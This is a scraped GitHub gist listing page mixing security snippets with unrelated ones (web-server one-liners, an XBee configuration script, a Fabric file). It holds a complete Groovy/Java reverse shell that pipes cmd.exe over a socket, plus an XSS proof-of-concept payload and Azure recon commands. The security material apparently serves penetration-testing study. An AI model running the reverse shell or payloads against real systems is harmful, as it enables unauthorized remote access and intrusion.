Skip to content

Instantly share code, notes, and snippets.

View SagiSatish's full-sized avatar

Satish SagiSatish

16 followers · 21 following
View GitHub Profile
@iknowjason
iknowjason / az-enum.sh
Last active September 8, 2025 14:11
Azure Enum & Recon Cheat Sheet
# Start with a DNS domain as seed, and do some recon to check if domain is M365 / Azure tenant hosted
# Insert your domain environment variable below
DOMAIN="microsoft.com"
# Check the getuserrealm.srf endpoint for domain information
# Check autodiscover.$DOMAIN DNS entry
host autodiscover.$DOMAIN
# Note: Checks autodiscover forward lookup ~ you should see a CNAME record for autodiscover.$DOMAIN pointing to autodiscover.otulook.com
@andripwn
andripwn / poc.js
Created January 23, 2020 16:29
PDF Bypass - Cross-site Scripting (XSS)
app.alert("XSS")
@mgeeky
mgeeky / IBM-MQ-Pentesting-notes.md
Last active July 2, 2025 08:47
Practical IBM MQ Penetration Testing notes, couple of handy tips and punch-q installation walkthrough

Practical IBM MQ Penetration Testing notes

In order to interact with IBM MQ in any way, we need to install IBM MQ Client libraries, available only on IBM website. Account registration will be required to get hands on them.

Step 1: Installing prerequisities

Pre-requisites: IBM MQ Client

  1. Download the IBM MQ V9.0.0.4 LTS Clients - the file should be named: 9.0.0.4-IBM-MQC-LinuxX64.tar.gz (9.0.0.4 Client install image for IBM MQ on Linux X86-64) - size: 397MB
  2. Extract it to whatever directory.
@rustymagnet3000
rustymagnet3000 / ios_introspection.md
Last active February 10, 2026 10:19
Static and Dynamic iOS inspection
@mgeeky
mgeeky / xml-attacks.md
Last active January 2, 2026 20:14
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.

@frohoff
frohoff / revsh.groovy
Created March 2, 2016 18:55
Pure Groovy/Java Reverse Shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@willurd
willurd / web-servers.md
Last active March 13, 2026 17:53
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@Gonzillaaa
Gonzillaaa / xbee-config.py
Created February 11, 2011 15:56
Python script to configure basic parameters of xbee radios
#!/usr/bin/env python
import sys, serial, time #@UnresolvedImport
class XBeeConfig:
def __init__( self, port = '', baud = 19200 ):
self.err, self.__ser__ = '', None
self.openSerial( port, baud )
@gcollazo
gcollazo / fabfile.py
Created July 28, 2010 17:16 — forked from onyxfish/fabfile.py
Sample fabfile.py
from fabric.api import *
"""
Base configuration
"""
env.project_name = '$(project)'
env.database_password = '$(db_password)'
env.site_media_prefix = "site_media"
env.admin_media_prefix = "admin_media"
env.newsapps_media_prefix = "na_media"